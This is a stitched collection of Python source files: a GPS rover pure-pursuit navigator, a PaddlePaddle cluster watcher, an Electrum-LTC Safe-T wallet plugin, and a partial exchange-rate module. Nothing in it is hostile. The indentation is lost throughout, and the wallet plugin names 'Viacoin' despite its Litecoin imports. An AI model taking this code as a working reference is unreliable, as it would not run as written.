lat = la * (math.pi / 180)
lon = lo * (math.pi / 180)
Huso = np.fix((lo / 6) + 31)
S = ((Huso * 6) - 183)
deltaS = lon - (S * (math.pi / 180))
Letra = ''
if (la < -72):
Letra = 'C'
elif (la < -64):
Letra = 'D'
elif (la < -56):
Letra = 'E'
elif (la < -48):
Letra = 'F'
elif (la < -40):
Letra = 'G'
elif (la < -32):
Letra = 'H'
elif (la < -24):
Letra = 'J'
elif (la < -16):
Letra = 'K'
elif (la < -8):
Letra = 'L'
elif (la < 0):
Letra = 'M'
elif (la < 8):
Letra = 'N'
elif (la < 16):
Letra = 'P'
elif (la < 24):
Letra = 'Q'
elif (la < 32):
Letra = 'R'
elif (la < 40):
Letra = 'S'
elif (la < 48):
Letra = 'T'
elif (la < 56):
Letra = 'U'
elif (la < 64):
Letra = 'V'
elif (la < 72):
Letra = 'W'
else:
Letra = 'X'
a = math.cos(lat) * math.sin(deltaS)
epsilon = 0.5 * math.log((1 + a) / (1 - a))
nu = math.atan(math.tan(lat) / math.cos(deltaS)) - lat
v = (c / ((1 + (e2cuadrada * (math.cos(lat)) ** 2))) ** 0.5) * 0.9996
ta = (e2cuadrada / 2) * epsilon ** 2 * (math.cos(lat)) ** 2
a1 = math.sin(2 * lat)
a2 = a1 * (math.cos(lat)) ** 2
j2 = lat + (a1 / 2)
j4 = ((3 * j2) + a2) / 4
j6 = ((5 * j4) + (a2 * (math.cos(lat)) ** 2)) / 3
alfa = (3 / 4) * e2cuadrada
beta = (5 / 3) * alfa ** 2
gama = (35 / 27) * alfa ** 3
bm = 0.9996 * c * (lat - alfa * j2 + beta * j4 - gama * j6)
xx = epsilon * v * (1 + (ta / 3)) + 500000
yy = nu * v * (1 + ta) + bm
if yy < 0:
yy = 9999999 + yy
x = xx
y = yy
utmzone = "%02d %c" % (Huso, Letra)
return x, y, utmzone
def smoothWaypoints(wp_utm, spacing):
la = wp_utm[0:, 0]
la = la.tolist()
lo = wp_utm[0:, 1]
lo = lo.tolist()
utmz = wp_utm[1, 2]
wla = [];
wlo = [];
u = [];
for i in range(len(la) - 1):
x2 = float(la[i + 1])
y2 = float(lo[i + 1])
x1 = float(la[i])
y1 = float(lo[i])
w1 = np.array([[x2], [y2]])
wi = np.array([[x1], [y1]])
v = w1 - wi;
if np.linalg.norm(v) == 0:
v = .000000000000000001
d = math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2);
num_points_that_fit = math.ceil(d / spacing);
vd = (v / np.linalg.norm(v)) * spacing;
for k in range(num_points_that_fit):
wla.append((wi[0] + vd[0] * k));
wlo.append((wi[1] + vd[1] * k));
u.append(utmz);
wla.append((float(la[len(la) - 1])))
wlo.append((float(lo[len(lo) - 1])))
u.append(utmz);
return wla, wlo, u
def signal_handler(sig, frame):
print('done\n')
sys.exit(0)
######
# Main#
######
def main():
c = 1
print('T-Rover Initializing...')
print(' ')
print('############START UDP###################')
print('Setting Up UDP Servers...')
# Set up thread for UDP client (phone is receiving as client to local USB-TCP stream)
th_gps_udp = threading.Thread(name='udpListener_gps_heading', target=udpListener_gps_heading, args=(sensorDict,))
th_gps_udp.start()
print('Awaiting Valid GPS Signal...')
# Check if sensorDict has gps value
noGPS = True
while noGPS:
if 'gps' in sensorDict.keys():
noGPS = False
time.sleep(1)
print('Valid GPS signal received from phone.')
print('##############END UDP#################')
print(' ')
print('##############START WAYPOINTS#################')
print('Loading Coarse GPS Waypoints...')
# read from local file <fname> and read into 2-D float array called: waypoints
f3 = open(fname, "r")
for x in f3:
latLong = x.split(",");
if ("\n" in latLong[1]):
latLong[1] = latLong[1].replace("\n", "")
latLong = [float(i) for i in latLong]
waypoints.append(latLong)
f3.close()
print('Converting Coarse GPS Waypoints to UTM Coordinates')
# convert all coarse gps waypoints to utm waypoints
for i in range(len(waypoints)):
[txx, tyy, tuu] = deg2utm(waypoints[i][0], waypoints[i][1])
waypoints_utm.append([txx, tyy, tuu])
np_waypoints_utm = np.array(waypoints_utm)
print('Smoothing UTM Waypoints...')
# smooth coarse utm waypoints
[sxx, syy, suu] = smoothWaypoints(np_waypoints_utm, spacingBetweenCoarseWaypoints)
troverGoal = (sxx[-1], syy[-1])
troverGoal = np.array(troverGoal)
print('##############END WAYPOINTS#################')
print(' ')
print('T-Rover System Ready!')
print('T-Rover Pure Pursuit Begin!')
distanceToGoal = 9999 # initial value
utmzone = ''
ss_rpi = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while (distanceToGoal > goalRadius):
tic()
rover_lat = sensorDict["gps"][0] # gps lat
rover_lon = sensorDict["gps"][1] # gps long
rover_heading_deg = sensorDict["compass"] # bearing angle (we may need to smooth this)
# print(rover_heading_deg)
rover_heading_rad = float(np.radians(rover_heading_deg))
[rover_x, rover_y, utmzone] = deg2utm(rover_lat, rover_lon) # convert robot position from gps to utm
pose = [rover_x, rover_y, rover_heading_rad]
# print('Current pose: %f, %f, %f' % (pose[0],pose[1],pose[2]))
pose = np.array(pose)
# print('Current pose: %f, %f, %f' % (pose[0], pose[1], pose[2]))
# print(pose)
# Calculate distance to goal
distanceToGoal = np.linalg.norm(pose[0:1] - troverGoal)
# print('Distance to goal: %d' % (distanceToGoal))
# Calculate goal point in utm coordinates
for i in range(len(sxx) - 1, -1, -1):
# W = wp_utm_smooth[i]
goal_x = sxx[i] # W[0]
goal_y = syy[i] # W[1]
x2 = pose[0]
y2 = pose[1]
d = math.sqrt((goal_x - x2) ** 2 + (goal_y - y2) ** 2)
if d <= L:
break
# print('Goal_X: %d, Goal_Y: %d' % (goal_x, goal_y))
if localPP:
[turnAngle_rad, speedValue] = purePursuit(pose, goal_x, goal_y, d)
else:
turnAngle_rad = networkPurePursuit(pose[0], pose[1], pose[2], goal_x, goal_y, d, pp_MaxTurnAngle)
turnAngle_deg = float(np.degrees(turnAngle_rad))
turnAngle_deg = -turnAngle_deg
o = "%s"%(turnAngle_deg)
ss_rpi.sendto(o.encode(), (rpiIP, rpiPort))
logging.info("%s,%s,%s,%s,%s,%s,%s,%s" % (rover_lat, rover_lon, rover_heading_deg, goal_x, goal_y, turnAngle_deg, L, d))
if (c % 10) == 0:
c = 0
#print('Turn Angle (Deg): %f, D_Goal: %d' % (turnAngle_deg, d))
c += 1
print('Turn Angle (Deg): %f, D_Goal: %d' % (turnAngle_deg, d))
toc()
print('Goal Reached!')
signal.signal(signal.SIGINT, signal_handler)
main()
|
cluster_watcher.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import threading
import time
from edl.discovery import etcd_client
from edl.utils import cluster as edl_cluster
from edl.utils.log_utils import logger
class Watcher(object):
def __init__(self, job_env, cluster):
self._job_id = job_env.job_id
# current context
self._cluster = copy.copy(cluster)
self._new_cluster = cluster
self._changed = False
logger.info("watcher gets the init cluster:{}".format(self._cluster))
self._lock = threading.Lock()
self._stop = threading.Event()
self._etcd = None
self._t_watcher = None
self._job_env = job_env
# assign value
self._etcd = etcd_client.EtcdClient(
self._job_env.etcd_endpoints, root=self._job_id
)
self._etcd.init()
self._t_watcher = threading.Thread(target=self._watcher)
self._t_watcher.start()
def _watcher(self):
while not self._stop.is_set():
# if cluster changed?
new_cluster = edl_cluster.wait_to_load_from_etcd(self._etcd, timeout=60)
with self._lock:
self._new_cluster = new_cluster
if self._is_world_changed():
break
with self._lock:
# update the cluster info.
self._cluster = copy.copy(self._new_cluster)
time.sleep(3)
@property
def changed(self):
with self._lock:
return self._changed
def _is_world_changed(self):
"""
list[Rank ordered pod_id] changed
"""
with self._lock:
old_stage = self._cluster.stage
new_stage = self._new_cluster.stage
old_ids = self._cluster.get_pods_ids_list()
new_ids = self._new_cluster.get_pods_ids_list()
if old_stage != new_stage or old_ids != new_ids:
logger.info(
"_is_world_changed find changed, \
old_stage:{} new_stage:{} old_ids:{} new_ids:{}".format(
old_stage, new_stage, old_ids, new_ids
)
)
with self._lock:
self._changed = True
return True
return False
def get_cluster(self):
with self._lock:
return self._cluster
def get_new_cluster(self):
with self._lock:
return self._new_cluster
def stop(self):
self._stop.set()
if self._t_watcher:
self._t_watcher.join()
with self._lock:
self._t_watcher = None
logger.info("watcher stopped")
def is_stopped(self):
with self._lock:
return self._t_watcher is None
def __exit__(self):
self.stop()
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_ltc.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_ltc.bip32 import BIP32Node
from electrum_ltc import constants
from electrum_ltc.i18n import _
from electrum_ltc.plugin import Device
from electrum_ltc.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_ltc.keystore import Hardware_KeyStore
from electrum_ltc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
from .client import SafeTClient
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
plugin: 'SafeTPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['SafeTClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Viacoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_safet_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_safet_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype._extend_address_n(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for out in tx.outputs():
o = t._add_bin_outputs()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("BTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def request_history(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/BTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class Bitcointoyou(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitcointoyou.com', "/API/ticker.aspx")
return {'BRL': Decimal(json['ticker']['last'])}
def history_ccys(self):
return ['BRL']
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['BTC'][r]) for r in json['BTC']
if json['BTC'][r] is not None] # Giving NULL for LTC
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def request_history(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=BTC")[ccy +'_BTC']
class Bitmarket(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitmarket.pl', '/json/BTCPLN/ticker.json')
return {'PLN': Decimal(json['last'])}
class BitPay(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitpay.com', '/api/rates')
return dict([(r['code'], Decimal(r['rate'])) for r in json])
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v2/ticker')
return {'MXN': Decimal(json['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/ticker/')
return {'USD': Decimal(json['last'])}
class Bitvalor(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['total']['last'])}
class BlockchainInfo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('blockchain.info', '/ticker')
return dict([(r, Decimal(json[r]['15m'])) for r in json])
class BTCChina(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('data.btcchina.com', '/data/ticker')
return {'CNY': Decimal(json['ticker']['last'])}
class BTCParalelo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('btcparalelo.com', '/api/price')
return {'VEF': Decimal(json['price'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('coinbase.com',
'/api/v1/currencies/exchange_rates')
return dict([(r[7:].upper(), Decimal(json[r]))
for r in json if r.startswith('btc_to_')])
class CoinDesk(ExchangeBase):
def get_currencies(self):
dicts = self.get_json('api.coindesk.com',
'/v1/bpi/supported-currencies.json')
return [d['currency'] for d in dicts]
def get_rates(self, ccy):
json = self.get_json('api.coindesk.com',
'/v1/bpi/currentprice/%s.json' % ccy)
result = {ccy: Decimal(json['bpi'][ccy]['rate_float'])}
return result
def history_starts(self):
return { 'USD': '2012-11-30', 'EUR': '2013-09-01' }
def history_ccys(self):
return self.history_starts().keys()
def request_history(self, ccy):
start = self.history_starts()[ccy]
end = datetime.today().strftime('%Y-%m-%d')
# Note ?currency and ?index don't work as documented. Sigh.
query = ('/v1/bpi/historical/close.json?start=%s&end=%s'
% (start, end))
json = self.get_json('api.coindesk.com', query)
return json['bpi']
class Coinsecure(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinsecure.in', '/v0/noauth/newticker')
return {'INR': Decimal(json['lastprice'] / 100.0 )}
class Foxbit(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['FOX']['last'])}
class itBit(ExchangeBase):
def get_rates(self, ccy):
ccys = ['USD', 'EUR', 'SGD']
json = self.get_json('api.itbit.com', '/v1/markets/XBT%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['lastPrice'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD', 'CAD', 'GBP', 'JPY']
pairs = ['XBT%s' % c for c in ccys]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
return dict((k[-3:], Decimal(float(v['c'][0])))
for k, v in json['result'].items())
class LocalBitcoins(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('localbitcoins.com',
'/bitcoinaverage/ticker-all-currencies/')
return dict([(r, Decimal(json[r]['rates']['last'])) for r in json])
class MercadoBitcoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['MBT']['last'])}
class NegocieCoins(ExchangeBase):
def get_rates(self,ccy):
